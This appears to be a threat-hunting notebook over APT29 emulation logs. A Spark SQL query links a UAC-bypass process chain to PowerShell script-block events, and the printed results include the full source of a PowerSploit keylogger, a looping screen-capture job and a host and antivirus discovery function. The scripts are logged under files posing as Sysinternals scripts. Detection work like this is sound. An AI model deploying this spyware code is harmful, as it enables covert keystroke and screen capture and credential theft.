--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
function Invoke-ScreenCapture
# https://www.pdq.com/blog/capturing-screenshots-with-powershell-and-net/
{
    Start-Job -Name "Screenshot" -ScriptBlock { 
        Write-Host "`nJobPID`n------`n$PID"
        while($true){
            $RandomFileName = [System.IO.Path]::GetRandomFileName(); 
            $Filepath="$env:USERPROFILE\Downloads\$RandomFileName.bmp"; 
            Add-Type -AssemblyName System.Windows.Forms; 
            Add-type -AssemblyName System.Drawing; 
            $Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen; 
            $Width = $Screen.Width; 
            $Height = $Screen.Height; 
            $Left = $Screen.Left; 
            $Top = $Screen.Top; 
            $bitmap = New-Object System.Drawing.Bitmap $Width, $Height; 
            $graphic = [System.Drawing.Graphics]::FromImage($bitmap); 
            $graphic.CopyFromScreen($Left, $Top, 0, 0, $bitmap.Size); 
            $bitmap.Save($Filepath); 
            Start-Sleep -Seconds 300
        } 
    }
}

ScriptBlock ID: b91c2ae7-3a03-49df-8d2a-4c42fc79df56
Path: C:\Program Files\SysinternalsSuite\psversion.ps1                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
-RECORD 2-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
function Invoke-Discovery {
    $DiscoveryInfo =@()
    $CurrentDir = Get-Location

    $DiscoveryInfo += [PSCustomObject]@{
                CurrentDirectory = $CurrentDir
                TempDirectory = $env:TEMP
                UserName = $env:USERNAME
                ComputerName = $env:COMPUTERNAME
                UserDomain = $env:USERDOMAIN
                CurrentPID = $PID
            }

    $DiscoveryInfo | Format-List
    
    $NameSpace = Get-WmiObject -Namespace "root" -Class "__Namespace" | Select Name | Out-String -Stream | Select-String "SecurityCenter"
    foreach ($SecurityCenter in $NameSpace) { 
        Get-WmiObject -Namespace "root\$SecurityCenter" -Class AntiVirusProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List
        WmiObject -Namespace "root\$SecurityCenter" -Class FireWallProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List 
    } 

    Gwmi Win32_OperatingSystem | Select Name, OSArchitecture, CSName, BuildNumber, Version | Format-List
    Invoke-NetUserGetGroups
    Invoke-NetUserGetLocalGroups
}

ScriptBlock ID: 70878299-2ee1-4a5d-869f-124b349aee1d
Path: C:\Program Files\SysinternalsSuite\readme.ps1                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                   

Query ID:9CFC783B-2DC8-4A3D-AC7B-2DF890827E2E

df = spark.sql(
'''
SELECT Message
FROM apt29Host f
INNER JOIN (
  SELECT split(d.NewProcessId, '0x')[1] as NewProcessId
  FROM apt29Host d
  INNER JOIN(
    SELECT a.ProcessId, a.NewProcessId
    FROM apt29Host a
    INNER JOIN (
      SELECT NewProcessId
      FROM apt29Host
      WHERE LOWER(Channel) = "security"
          AND EventID = 4688
          AND LOWER(NewProcessName) LIKE "%control.exe"
          AND LOWER(ParentProcessName) LIKE "%sdclt.exe"
    ) b
    ON a.ProcessId = b.NewProcessId
    WHERE LOWER(a.Channel) = "security"
      AND a.EventID = 4688
      AND a.MandatoryLabel = "S-1-16-12288"
      AND a.TokenElevationType = "%%1937"
  ) c
  ON d.ProcessId = c.NewProcessId
  WHERE LOWER(d.Channel) = "security"
    AND d.EventID = 4688
    AND d.NewProcessName LIKE '%powershell.exe'
) e
ON LOWER(hex(f.ExecutionProcessID)) = e.NewProcessId
WHERE f.Channel = "Microsoft-Windows-PowerShell/Operational"
  AND f.EventID = 4104
  AND LOWER(f.ScriptBlockText) LIKE "%$pid%"

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
function Get-Keystrokes {
<#
.SYNOPSIS
 
    Logs keys pressed, time and the active window (when changed).
    Some modifications for Empire by @harmj0y.
    
    PowerSploit Function: Get-Keystrokes
    Author: Chris Campbell (@obscuresec) and Matthew Graeber (@mattifestation)
    Modifications: @harmj0y
    License: BSD 3-Clause
    Required Dependencies: None
    Optional Dependencies: None
    
.LINK
    http://www.obscuresec.com/
    http://www.exploit-monday.com/
#>
    Start-Job -Name "Keystrokes" -ScriptBlock {
        Write-Host "`nJobPID`n------`n$PID"
        [Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms') | Out-Null

        try
        {
            $ImportDll = [User32]
        }
        catch
        {
            $DynAssembly = New-Object System.Reflection.AssemblyName('Win32Lib')
            $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
            $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('Win32Lib', $False)
            $TypeBuilder = $ModuleBuilder.DefineType('User32', 'Public, Class')

            $DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
            $FieldArray = [Reflection.FieldInfo[]] @(
                [Runtime.InteropServices.DllImportAttribute].GetField('EntryPoint'),
                [Runtime.InteropServices.DllImportAttribute].GetField('ExactSpelling'),
                [Runtime.InteropServices.DllImportAttribute].GetField('SetLastError'),
                [Runtime.InteropServices.DllImportAttribute].GetField('PreserveSig'),
                [Runtime.InteropServices.DllImportAttribute].GetField('CallingConvention'),
                [Runtime.InteropServices.DllImportAttribute].GetField('CharSet')
            )

            $PInvokeMethod = $TypeBuilder.DefineMethod('GetAsyncKeyState', 'Public, Static', [Int16], [Type[]] @([Windows.Forms.Keys]))
            $FieldValueArray = [Object[]] @(
                'GetAsyncKeyState',
                $True,
                $False,
                $True,
                [Runtime.InteropServices.CallingConvention]::Winapi,
                [Runtime.InteropServices.CharSet]::Auto
            )
            $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
            $PInvokeMethod.SetCustomAttribute($CustomAttribute)

            $PInvokeMethod = $TypeBuilder.DefineMethod('GetKeyboardState', 'Public, Static', [Int32], [Type[]] @([Byte[]]))
            $FieldValueArray = [Object[]] @(
                'GetKeyboardState',
                $True,
                $False,
                $True,
                [Runtime.InteropServices.CallingConvention]::Winapi,
                [Runtime.InteropServices.CharSet]::Auto
            )
            $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
            $PInvokeMethod.SetCustomAttribute($CustomAttribute)

            $PInvokeMethod = $TypeBuilder.DefineMethod('MapVirtualKey', 'Public, Static', [Int32], [Type[]] @([Int32], [Int32]))
            $FieldValueArray = [Object[]] @(
                'MapVirtualKey',
                $False,
                $False,
                $True,
                [Runtime.InteropServices.CallingConvention]::Winapi,
                [Runtime.InteropServices.CharSet]::Auto
            )
            $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
            $PInvokeMethod.SetCustomAttribute($CustomAttribute)

            $PInvokeMethod = $TypeBuilder.DefineMethod('ToUnicode', 'Public, Static', [Int32],
                [Type[]] @([UInt32], [UInt32], [Byte[]], [Text.StringBuilder], [Int32], [UInt32]))
            $FieldValueArray = [Object[]] @(
                'ToUnicode',
                $False,
                $False,
                $True,
                [Runtime.InteropServices.CallingConvention]::Winapi,
                [Runtime.InteropServices.CharSet]::Auto
            )
            $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
            $PInvokeMethod.SetCustomAttribute($CustomAttribute)

            $PInvokeMethod = $TypeBuilder.DefineMethod('GetForegroundWindow', 'Public, Static', [IntPtr], [Type[]] @())
            $FieldValueArray = [Object[]] @(
                'GetForegroundWindow',
                $True,
                $False,
                $True,
                [Runtime.InteropServices.CallingConvention]::Winapi,
                [Runtime.InteropServices.CharSet]::Auto
            )
            $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
            $PInvokeMethod.SetCustomAttribute($CustomAttribute)

            $ImportDll = $TypeBuilder.CreateType()
        }

        $LastWindowTitle = ""
        $i=0
        while ($true) {
            Start-Sleep -Milliseconds 40
            $gotit = ""
            $Outout = ""
            
            for ($char = 1; $char -le 254; $char++) {
                $vkey = $char
                $gotit = $ImportDll::GetAsyncKeyState($vkey)
                
                if ($gotit -eq -32767) {

                    #check for keys not mapped by virtual keyboard
                    $LeftShift    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::LShiftKey) -band 0x8000) -eq 0x8000
                    $RightShift   = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RShiftKey) -band 0x8000) -eq 0x8000
                    $LeftCtrl     = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::LControlKey) -band 0x8000) -eq 0x8000
                    $RightCtrl    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RControlKey) -band 0x8000) -eq 0x8000
                    $LeftAlt      = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::LMenu) -band 0x8000) -eq 0x8000
                    $RightAlt     = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RMenu) -band 0x8000) -eq 0x8000
                    $TabKey       = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Tab) -band 0x8000) -eq 0x8000
                    $SpaceBar     = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Space) -band 0x8000) -eq 0x8000
                    $DeleteKey    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Delete) -band 0x8000) -eq 0x8000
                    $EnterKey     = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Return) -band 0x8000) -eq 0x8000
                    $BackSpaceKey = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Back) -band 0x8000) -eq 0x8000
                    $LeftArrow    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Left) -band 0x8000) -eq 0x8000
                    $RightArrow   = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Right) -band 0x8000) -eq 0x8000
                    $UpArrow      = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Up) -band 0x8000) -eq 0x8000
                    $DownArrow    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Down) -band 0x8000) -eq 0x8000
                    $LeftMouse    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::LButton) -band 0x8000) -eq 0x8000
                    $RightMouse   = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RButton) -band 0x8000) -eq 0x8000

                    if ($LeftShift -or $RightShift) {$Outout += '[Shift]'}
                    if ($LeftCtrl  -or $RightCtrl)  {$Outout += '[Ctrl]'}
                    if ($LeftAlt   -or $RightAlt)   {$Outout += '[Alt]'}
                    if ($TabKey)       {$Outout += '[Tab]'}
                    if ($SpaceBar)     {$Outout += '[SpaceBar]'}
                    if ($DeleteKey)    {$Outout += '[Delete]'}
                    if ($EnterKey)     {$Outout += '[Enter]'}
                    if ($BackSpaceKey) {$Outout += '[Backspace]'}
                    if ($LeftArrow)    {$Outout += '[Left Arrow]'}
                    if ($RightArrow)   {$Outout += '[Right Arrow]'}
                    if ($UpArrow)      {$Outout += '[Up Arrow]'}
                    if ($DownArrow)    {$Outout += '[Down Arrow]'}
                    if ($LeftMouse)    {$Outout += '[Left Mouse]'}
                    if ($RightMouse)   {$Outout += '[Right Mouse]'}

                    #check for capslock
                    if ([Console]::CapsLock) {$Outout += '[Caps Lock]'}

                    $scancode = $ImportDll::MapVirtualKey($vkey, 0x3)
                    
                    $kbstate = New-Object Byte[] 256
                    $checkkbstate = $ImportDll::GetKeyboardState($kbstate)
                    
                    $mychar = New-Object -TypeName "System.Text.StringBuilder";
                    $unicode_res = $ImportDll::ToUnicode($vkey, $scancode, $kbstate, $mychar, $mychar.Capacity, 0)

                    #get the title of the foreground window
                    $TopWindow = $ImportDll::GetForegroundWindow()
                    $WindowTitle = (Get-Process | Where-Object { $_.MainWindowHandle -eq $TopWindow }).MainWindowTitle
                    
                    if ($unicode_res -gt 0) {
                        if ($WindowTitle -ne $LastWindowTitle){
                            # if the window has changed
                            $TimeStamp = (Get-Date -Format dd/MM/yyyy:HH:mm:ss:ff)
                            $Outout = "`n`n$WindowTitle - $TimeStamp`n"
                            $LastWindowTitle = $WindowTitle
                        }
                        $Outout += $mychar.ToString()
                        $Outout
                    }
                }
            }
        }
    }
}

ScriptBlock ID: fa9f2b3a-3f5e-4d3c-93c9-7172cc073add
Path: C:\Program Files\SysinternalsSuite\psversion.ps1 
-RECORD 1-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
function Invoke-ScreenCapture
# https://www.pdq.com/blog/capturing-screenshots-with-powershell-and-net/
{
    Start-Job -Name "Screenshot" -ScriptBlock { 
        Write-Host "`nJobPID`n------`n$PID"
        while($true){
            $RandomFileName = [System.IO.Path]::GetRandomFileName(); 
            $Filepath="$env:USERPROFILE\Downloads\$RandomFileName.bmp"; 
            Add-Type -AssemblyName System.Windows.Forms; 
            Add-type -AssemblyName System.Drawing; 
            $Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen; 
            $Width = $Screen.Width; 
            $Height = $Screen.Height; 
            $Left = $Screen.Left; 
            $Top = $Screen.Top; 
            $bitmap = New-Object System.Drawing.Bitmap $Width, $Height; 
            $graphic = [System.Drawing.Graphics]::FromImage($bitmap); 
            $graphic.CopyFromScreen($Left, $Top, 0, 0, $bitmap.Size); 
            $bitmap.Save($Filepath); 
            Start-Sleep -Seconds 300
        } 
    }
}

ScriptBlock ID: b91c2ae7-3a03-49df-8d2a-4c42fc79df56
Path: C:\Program Files\SysinternalsSuite\psversion.ps1                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
-RECORD 2---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------